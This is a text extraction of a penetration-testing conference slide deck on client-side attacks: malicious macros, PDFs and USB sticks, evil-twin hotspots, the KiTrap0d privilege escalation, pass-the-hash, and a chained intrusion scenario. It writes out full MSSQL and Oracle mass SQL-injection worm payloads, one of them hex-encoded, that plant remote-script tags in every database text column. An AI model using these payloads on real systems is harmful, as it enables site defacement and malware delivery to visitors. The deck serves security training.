Tactical Assassins

Tactical Assassins : Client-Side OWNage

Prathan Phongthiproek ACIS Professional Center Senior Information Security Consultant

  Instructor / Speaker  Red Team : Penetration Tester (Team Leader)  Security Consultant / Researcher  CWH Underground  Exploits and Vulnerabilities Disclosure

  Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc

Who am I ?!

Let’s Talk !

 Attack Layer 8: Client-Side OWNage  MS Office (Evil Macro)  Malicious Adobe PDF  Malicious USB  One-Click Attack  Evil-Twin Attack !

 Built-in Pen-Test Tactics  Black Hat versus White Hat  Using Black Hat styles to Compromise system

 Operation CloudBurst

Client-Side OWNage The Way to Attack Layer 8!

MS Office (Evil Macro) !  MS Office is Evil !!

MS Office (Evil Macro) !



Malicious Adobe PDF !





Malicious PDF File



Malicious USB !

  Autoplay NOT Autorun

Malicious USB !

  Turn Off Autoplay -> It’s still vulnerable from evil usb

Malicious USB !

Malicious USB !

Malicious USB !

\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

0xff

Malicious USB !

One-Click Attack !

One-Click Attack !

One-Click Attack !

  SQL Injection Worms - MSSQL !

  ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--

One-Click Attack !

  SQL Injection Worms - MSSQL !

  ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(D E C L A R E @ T v a r c h a r ( 2 5 5 ) , @ C v a r c h a r ( 2 5 5 ) D E C L A R E T a b l e _ C u r s o r C U R S O R F O R s e l e c t a . n a m e , b . n a m e f r o m s y s o b j e c t s a , s y s c o l u m n s b w h e r e a . i d = b . i d a n d a . x t y p e = ' u ' a n d ( b . x t y p e = 9 9 o r b . x t y p e = 3 5 o r b . x t y p e = 2 3 1 o r b . x t y p e = 1 6 7 ) O P E N T a b l e _ C u r s o r F E T C H N E X T F R O M T a b l e _ C u r s o r I N T O @ T , @ C W H I L E ( @ @ F E T C H _ S T A T U S = 0 ) B E G I N e x e c ( ' u p d a t e [ ' + @ T + ' ] s e t [ ' + @ C + ' ] = r t r i m ( c o n v e r t ( v a r c h a r , [ ' + @ C + ' ] ) ) + ' ' < s c r i p t s r c = h t t p : / / w w w . f e n g n i m a . c n / k . j s > < / s c r i p t > ' ' ' ) F E T C H N E X T F R O M T a b l e _ C u r s o r I N T O @ T , @ C E N D C L O S E T a b l e _ C u r s o r D E A L L O C A T E T a b l e _ C u r s o r undefined AS%20NVARCHAR(4000));EXEC(@S);--

One-Click Attack !

  SQL Injection Worms - Oracle !

  http://127.0.0.1:81/ora4.php?name=1 and 1=(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin execute immediate '''''''' alter session set current_schema=SCOTT ''''''''; execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)||chr(97)||chr(116)|| chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||C.column_name||chr(61)||C.column_name|| chr(124)||chr(124)||chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||chr(115)||chr(114)||chr(99)|| chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)|| chr(111)||chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)||chr(46)||chr(99)||chr(111)|| chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)|| chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME = C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr(82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr(72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE rec.foo;end loop;execute immediate ''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--

One-Click Attack !

One-Click Attack !

One-Click Attack !

One-Click Attack !

One-Click Attack !

Link to Malicious Website

Reverse Shell to Attackers

One-Click Attack !

Evil-Twin Attack !

 Karma + Metasploit = Karmetasploit !!

 Rouge Access Point (Evil Twin): Steal usernames, passwords and information from public wireless hotspots

 Why we don’t steal something evil like credit card (Pay to Play) ??

Evil-Twin Attack !

Evil-Twin Attack !

Evil-Twin Attack !

Built-in Pen-Test Tactics !

Black Hat versus White Hat!  Thinking Outside of the Box

  Know one piece of information and have to expand from there

  Compromise all system and Target Attack

  All Methodologies was Integrate

  Manual Foot printing, No noisy scan, Just Nmap and 0-Day Attack

  Attack Layer 8 :Client-Side OWNage

  Thinking Inside the box

  Assigned Limited block of IP address

  Unable to go beyond the scope of approved list, Only touch xyz hosts, Don’t touch abc host.

  Follow Pen-Test Methodologies; OSSTMM, NIST, ISSAF

  Download Exploit from Milw0rm, Exploit with Core Impact, CANVAS, Metasploit

  Oops, I cannot hack user.

 Pen-Tester Must “Thinking outside of the box”

 Attack Layer 8 : More effective result

 Pen-Test with Black Hat styles

  Using Black Hat Mind   Email Address Enumeration   Social Networking (Maltego)   Social Engineering (Adobe PDF, Evil Macro, One-Click

Attack, IE Aurora, etc)   Information Gathering All subdomain

  xyz.victim.com, abc.victim.com, 123.victim.com   Blind Test, Compromise all system and Target Attack

Using Black Hat styles to Compromise system

Using Black Hat styles to Compromise system

Operation CloudBurst!

  MS Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack

  Affect every release of the Windows NT kernel (Window 2000, XP, Server 2003, Vista, Server 2008, 7)

  Non-Affect : Windows 7 (64-bit), Windows Server 2008 (64-bit, Itanium)

  Patch release MS10-015 on Feb 09 2010

  0-day for 1 month. W00t ! W00t !

KiTra0d – Local Ring0 Kernel Exploit

Get The Hell Outta Here !!

KiTra0d – Local Ring0 Kernel Exploit

  Token - Web Cookies

  On Windows XP / 2003 – Windows Service run as SYSTEM account   Compromise of a Service == Full System Compromise

  On Windows Vista / 2008 - LocalService / NetworkService == System

  Affect every release of the Windows NT kernel (Window 2000, XP, Server 2003, Vista, Server 2008, 7)

  Patch release MS09-012 on April 14 2009

  0-day for 1 year. W00t ! W00t !!

  Black hat Mind !!   Combine Attack Layer 8 + KiTrap0d + Token Kidnapping

Token Kidnapping – Elevate Privilege

 Start Mission with Attack Layer 8   SPAM Mail / 1-Click Ownage   Reverse Shell to Attacker

 KiTrap0D – The Message From Slave to God   0-Day Ring0 xpl, All Windows OS

 Maintain Access   Pivot (Tunneling), Backdoor Position

 Compromise All System and Domain Controller   Impersonate Token, Pass-The-Hash Attack

Operation CloudBurst

Operation CloudBurst!

Internet

Reverse Shell connection to Attacker

KiTrap0d XPL Pivot Network – Route Add

Attack Network – Passthehash, impersonate Token

Intranet

If someone is still in the room.. Q&A!

THANK YOU !

Documents

Tactical Assassins